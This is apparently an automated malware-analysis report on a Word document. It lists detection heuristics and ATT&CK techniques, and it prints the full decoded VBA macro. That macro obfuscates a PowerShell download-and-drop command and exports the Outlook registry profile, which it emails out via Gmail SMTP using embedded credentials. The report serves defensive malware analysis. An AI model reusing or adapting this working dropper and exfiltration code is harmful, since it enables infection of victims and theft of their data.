MALICIOUS
402
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros that utilize WScript.Shell to execute commands. The macro obfuscates the string 'powershell' and constructs a command to download a file from 'http://tiny.cc/zw0npy' using Invoke-WebRequest, saving it as a .vbs file in the user's profile directory. This indicates a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-7144189-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7144189-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Download = FileName7 & " Invoke-WebRequest -Uri ""http://tiny.cc/zw0npy"" -OutFile " & FileName5 ExecDown = Shell(Download, 0) 'Substitution = "SchTasks /Create /TN " & TempCopy & " /TR " & FileName5 & " /SC MINUTE /mo 10 /F" -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%") -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
For Each strRegPath In arrRegPaths strCommand = "cmd /c REG EXPORT """ & strRegPath & """ """ & Replace(strRegPath, "\", "_") & ".txt""" objShell.Run strCommand, 0, True -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://tiny.cc/zw0npyReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/sendusingReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/smtpserverReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/smtpauthenticateReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/sendusernameReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/sendpasswordReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/smtpserverportReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/smtpusesslReferenced by macro
- http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeoutReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5678 bytes |
SHA-256: 06682bf7bf62e45659d6a5f9706a1a571bc3a50c29d01b10e36bf7ba04a0070d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec()
Dim CharacterSetArray, i, j, Count, Chars, Index, Temp, TempCopy
CharacterSetArray = Array(Array(7, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), Array(1, "0123456789"))
For i = 0 To UBound(CharacterSetArray)
Count = CharacterSetArray(i)(0)
Chars = CharacterSetArray(i)(1)
For j = 1 To Count
Index = Int(Rnd() * Len(Chars)) + 1
Temp = Temp & Mid(Chars, Index, 1)
Next
Next
Do Until Len(Temp) = 0
Index = Int(Rnd() * Len(Temp)) + 1
TempCopy = TempCopy & Mid(Temp, Index, 1)
Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
Loop
Set oShell = CreateObject("WScript.Shell")
strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")
FileName2 = strProFolder & "\" & TempCopy & ".e" & "x" & "e"
FileName5 = strProFolder & "\" & TempCopy & ".v" & "b" & "s"
FileName = strDrivFolder & "\W" & "i" & "nd" & "ow" & "s\sy" & "stem" & "3" & "2" & "\W" & "ind" & "ow" & "sP" & "owerSh" & "e" & "ll\v" & "1" & ".0\p" & "ower" & "s" & "he" & "ll." & "e" & "x" & "e"
FileName7 = "po" & "we" & "rsh" & "el" & "l"
Download = FileName7 & " Invoke-WebRequest -Uri ""http://tiny.cc/zw0npy"" -OutFile " & FileName5
ExecDown = Shell(Download, 0)
'Substitution = "SchTasks /Create /TN " & TempCopy & " /TR " & FileName5 & " /SC MINUTE /mo 10 /F"
'ExecSub = Shell(Substitution, 0)
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
arrRegPaths = Array("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook")
Const intForReading = 1
Const intUnicode = -1
strFileName = objShell.ExpandEnvironmentStrings("%UserProfile%") & "\Register.txt"
strHomeFolder = objShell.ExpandEnvironmentStrings("%ComputerName%")
Set objRegFile = objFSO.CreateTextFile(strFileName, True, True)
objRegFile.WriteLine "Windows Registry Editor Version 5.00"
For Each strRegPath In arrRegPaths
strCommand = "cmd /c REG EXPORT """ & strRegPath & """ """ & Replace(strRegPath, "\", "_") & ".txt"""
objShell.Run strCommand, 0, True
If objFSO.FileExists(Replace(strRegPath, "\", "_") & ".txt") = True Then
'WScript.Sleep 10000 ' Wait one second to give the file time to close
Set objInputFile = objFSO.OpenTextFile(Replace(strRegPath, "\", "_") & ".txt", intForReading, False, intUnicode)
If Not objInputFile.AtEndOfStream Then
objInputFile.SkipLine
objRegFile.Write objInputFile.ReadAll
End If
objInputFile.Close
Set objInputFile = Nothing
objFSO.DeleteFile Replace(strRegPath, "\", "_") & ".txt", True
End If
Next
objRegFile.Close
Set objRegFile = Nothing
ASDJFioegnr = strHomeFolder
eiehovhreuib = strFileName
FIDFndnrubgFIDFndnrubg = "ocme" & " xport"
FIDFndnrubgFIDFndnrubg = FIDFndnrubgFIDFndnrubg + "s@" & "g" & "mai"
DGHIhgnsjkfdgDGHIhgnsjkfdg = "ocm"
Const yuvehbrDGIRG = "Yail"
KGIGAjdgkg = "sout" & "hgatel"
KGIGAjdgkg = KGIGAjdgkg + "lp@p" & "rotonm"
KGIGAjdgkg = KGIGAjdgkg + "ail.ch;s" & "outhgat"
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "e"
Const dkfjgaeguGJd = "sm" & "tp.g" & "ma" & "il" & ".co" & "m"
Const fhdfjkHJHJd = True
Const DSFJTAJPdjgkfd = 465
HJfefwenksdaHJfefwenksdaJfefwenksda = "oc" & "mexp"
HJfefwenksdaHJfefwenksdaJfefwenksda = HJfefwenksdaHJfefwenksdaJfefwenksda + "ort" & "s@" & "gm"
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "xpor"
Const cdoSendUsingPickup = 1
Const cdoSendUsingPort = 2
Const cdoAnonymous = 0
Const cdoBasic = 1
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "ts" & "1"
HJfefwenksdaHJfefwenksdaJfefwenksda = HJfefwenksdaHJfefwenksdaJfefwenksda + "ail.c" & "om"
KGIGAjdgkg = KGIGAjdgkg + "ellp@yan" & "dex.c" & "om"
FIDFndnrubgFIDFndnrubg = FIDFndnrubgFIDFndnrubg + "l.c" & "o" & "m"
Const cdoNTLM = 2
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = ASDJFioegnr
objMessage.From = """" & yuvehbrDGIRG & """ <" & FIDFndnrubgFIDFndnrubg & ">"
objMessage.To = KGIGAjdgkg
objMessage.TextBody = eiehovhreuib
objMessage.AddAttachment strFileName
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = dkfjgaeguGJd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = cdoBasic
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = HJfefwenksdaHJfefwenksdaJfefwenksda
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = DGHIhgnsjkfdgDGHIhgnsjkfdg
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = DSFJTAJPdjgkfd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = fhdfjkHJHJd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
objMessage.Configuration.Fields.Update
On Error Resume Next
objMessage.Send
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 16384 bytes |
SHA-256: 71f99026e324b73dee4f22c58bb7f2e3a81679fcc647d69807e1a5cc7ffbbee8 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.